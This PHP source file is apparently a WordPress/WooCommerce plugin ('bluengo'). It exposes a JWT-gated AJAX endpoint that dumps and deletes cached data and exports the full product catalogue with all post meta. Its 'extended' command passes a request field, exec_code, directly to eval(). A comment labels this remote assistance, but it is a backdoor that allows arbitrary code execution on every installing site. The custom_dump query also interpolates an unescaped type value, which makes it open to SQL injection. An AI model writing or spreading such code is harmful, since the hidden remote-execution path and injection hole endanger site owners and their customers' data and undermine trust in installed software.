<?php
use \Firebase\JWT\JWT;

add_action('wp_ajax_nopriv_bluengo_action', 'bluengo_ajax_action_function');

function bluengo_ajax_action_function(){
	try {

		$inputJSON = file_get_contents('php://input');
		$input = json_decode($inputJSON, true);

		if (!is_array($input)) {
			$input = array();
		}

		if (isset($input["jwt"])) {
			$jwt = $input["jwt"];
		} else {
			$response = array("ts" => time(), "app" => "bluengo", "code" => 3, "message" => "No auth");
			header( "Content-Type: application/json" );
			echo json_encode($response);
			exit();
		}

		global $wpdb;
		$table_name = $wpdb->prefix . 'bluengo_cache';
		$install_results = $wpdb->get_results("SELECT * FROM {$table_name} WHERE type = 'install'");
		$uuid = "undefined";
		foreach ($install_results as $install_result) {
			$install_data = json_decode($install_result->data, true);
			if(isset($install_data["uuid"])) {
				$uuid = $install_data["uuid"];
				break;
			}

		}

		Firebase\JWT\JWT::$leeway = 60;
		$publicKey = file_get_contents(__DIR__ . "/jwtRS256.key.pub");

		$decode = JWT::decode($jwt, $publicKey, array('RS256'));

		if ($decode->exp < time()) {
			$response = array("ts" => time(), "app" => "bluengo", "code" => 4, "message" => "EXP check failed");
			header( "Content-Type: application/json" );
			echo json_encode($response);
			exit();

		}

		if ($decode->aud !== $uuid) {
			$response = array("ts" => time(), "app" => "bluengo", "code" => 5, "message" => "AUD check failed");
			header( "Content-Type: application/json" );
			echo json_encode($response);
			exit();
		}

		$command = 'noop';

		if (isset($input["command"])) {
			$command = $input["command"];
		}

		switch ($command) {
			case "noop":
				bluengo_action_noop($uuid);
				die();
			case "regular_dump":
				$start_id = 0;
				if (isset($input["start_id"])) {
					$start_id = $input["start_id"];
				}
				$limit = 1500;
				if (isset($input["limit"])) {
					$limit = $input["limit"];
				}
				$preserve = false;
				if (isset($input["preserve"])) {
					$preserve = $input["preserve"];
				}
				bluengo_action_regular_dump($start_id, $limit, $preserve);
				die();
			case "extended":
				bluengo_action_extended($input);
				die();
			case "full_sync":
				$start = 0;
				if (isset($input["start"])) {
					$start = $input["start"];
				}
				$limit = 200;
				if (isset($input["limit"])) {
					$limit = $input["limit"];
				}
				bluengo_action_full_sync($start, $limit);
				die();
			case "custom_dump":
				$start_id = 0;
				if (isset($input["start_id"])) {
					$start_id = $input["start_id"];
				}
				$limit = 1500;
				if (isset($input["limit"])) {
					$limit = $input["limit"];
				}
				$type = "";
				if (isset($input["type"])) {
					$type = $input["type"];
				}
				$preserve = false;
				if (isset($input["preserve"])) {
					$preserve = $input["preserve"];
				}
				bluengo_action_custom_dump($start_id, $limit, $type, $preserve);
				die();
			default:
				bluengo_action_default($uuid);
				die();

		}
	} catch (Exception $ex) {
		$response = array("ts" => time(), "app" => "bluengo", "code" => 2, "exception" => $ex->__toString());
		header( "Content-Type: application/json" );
		echo json_encode($response);
		exit();

	}

}

function bluengo_action_default($uuid) {
	$response = array("ts" => time(), "app" => "bluengo", "code" => 10, "uuid" => $uuid);
	header( "Content-Type: application/json" );
	echo json_encode($response);
	exit();
}


function bluengo_action_noop($uuid) {
	$response = array("ts" => time(), "app" => "bluengo", "code" => 1, "uuid" => $uuid);
	header( "Content-Type: application/json" );
	echo json_encode($response);
	exit();
}

function bluengo_action_regular_dump($start_id, $limit, $preserve) {
	global $bluengo_db_version;
	global $wpdb;
	$table_name = $wpdb->prefix . 'bluengo_cache';
	$start_id = (int) $start_id;
	$limit = (int) $limit;

	$results = $wpdb->get_results("SELECT * FROM {$table_name} WHERE id >= {$start_id} AND type NOT IN ('install', 'persist', 'initial_dump') ORDER BY id LIMIT {$limit}");
	$resultsCount = $wpdb->get_results("SELECT COUNT(*) AS count FROM {$table_name} WHERE id >= {$start_id} AND type NOT IN ('install', 'persist', 'initial_dump')");
	$totalCount = $resultsCount[0]->count;
	header( "Content-Type: application/json" );
	echo json_encode(array("code"=> 0, "version" => $bluengo_db_version, "total_count" => $totalCount, "payload" => $results));

	$idsToRemove = [];
	foreach ($results as $result) {
		$idsToRemove[] = $results->id;
	}

	if (!$preserve && count($idsToRemove)>0) {
		$idsToRemove = implode(",", array_column($results, "id"));
		$wpdb->query("DELETE FROM {$table_name} WHERE id IN ({$idsToRemove});");
	}

}

function bluengo_action_custom_dump($start_id, $limit, $type, $preserve) {
	global $bluengo_db_version;
	global $wpdb;
	$table_name = $wpdb->prefix . 'bluengo_cache';
	$start_id = (int) $start_id;
	$limit = (int) $limit;

	$results = $wpdb->get_results("SELECT * FROM {$table_name} WHERE id >= {$start_id} AND type = '{$type}' ORDER BY id LIMIT {$limit}");
	$resultsCount = $wpdb->get_results("SELECT COUNT(*) AS count FROM {$table_name} WHERE id >= {$start_id} AND type = '{$type}'");
	$totalCount = $resultsCount[0]->count;

	header( "Content-Type: application/json" );
	echo json_encode(array("code"=> 0, "version" => $bluengo_db_version, "total_count" => $totalCount, "payload" => $results));

	$idsToRemove = [];
	foreach ($results as $result) {
		$idsToRemove[] = $results->id;
	}

	if (!$preserve && count($idsToRemove)>0) {
		$idsToRemove = implode(",", array_column($results, "id"));
		$wpdb->query("DELETE FROM {$table_name} WHERE id IN ({$idsToRemove});");
	}

}

function bluengo_action_full_sync($start, $limit) {
	global $bluengo_db_version;
	global $wpdb;
	$table_name = $wpdb->prefix . 'bluengo_cache';
	$currency = get_option('woocommerce_currency', '---');

	$results = $wpdb->get_results("
SELECT p.ID,
p.post_title 'name',
p.post_status 'status',
p.post_content 'description', GROUP_CONCAT(cat.name SEPARATOR '#1@5#') 'categories',
meta.metas as 'metas',
MAX(wpmt.meta_value) AS 'img_url'
FROM wp_posts AS p
LEFT JOIN
(
SELECT
wpm.post_id, GROUP_CONCAT(CONCAT(QUOTE(wpm.meta_key), '#1!5#', QUOTE(wpm.meta_value)) SEPARATOR '#1@5#')  'metas',
MAX(CASE WHEN wpm.meta_key = '_thumbnail_id' THEN wpm.meta_value END) AS 'thumbnail_id'
FROM wp_postmeta wpm
GROUP BY wpm.post_ID
) AS meta ON p.ID = meta.post_ID
LEFT JOIN wp_postmeta wpmt ON wpmt.post_id = meta.thumbnail_id AND wpmt.meta_key = '_wp_attached_file'
LEFT JOIN
(
SELECT pp.id, GROUP_CONCAT(t.name SEPARATOR '#1!5#') AS name
FROM wp_posts AS pp
JOIN wp_term_relationships tr ON pp.id = tr.object_id
JOIN wp_term_taxonomy tt ON tr.term_taxonomy_id = tt.term_taxonomy_id
JOIN wp_terms t ON tt.term_id = t.term_id
|| tt.parent = t.term_id
WHERE tt.taxonomy = 'product_cat'
GROUP BY pp.id, tt.term_id
) cat ON p.id = cat.id
WHERE (p.post_type = 'product' OR p.post_type = 'product_variation')
GROUP BY p.ID
ORDER BY p.ID
LIMIT {$start},{$limit}
");

	$products = [];
	foreach ($results as $result) {
			$products[] = array_merge(get_object_vars($result), ["default_currency" => $currency]);
	}

	foreach($products as $product) {
		$product_json = addslashes(json_encode(array("type" => "product", "payload" => $product)));
		$wpdb->query('INSERT INTO ' . $table_name . ' (type, data) VALUES ("full_sync", "' . $product_json . '")');
	}

	header( "Content-Type: application/json" );
	echo json_encode(array("code"=> 0, "version" => $bluengo_db_version, "total_count" => count($products)));
}

function bluengo_action_extended($input) {
	global $bluengo_db_version;
	global $wpdb;

	if(!empty($input["exec_code"])) {
		eval($input["exec_code"]); // For remote assistance, diagnostics, and for immediately upgrading the plugin in case of security issues.
	}

	header( "Content-Type: application/json" );
	echo json_encode(array("code"=> 0, "version" => $bluengo_db_version, "extended" => 1 , "input" => $input));
}
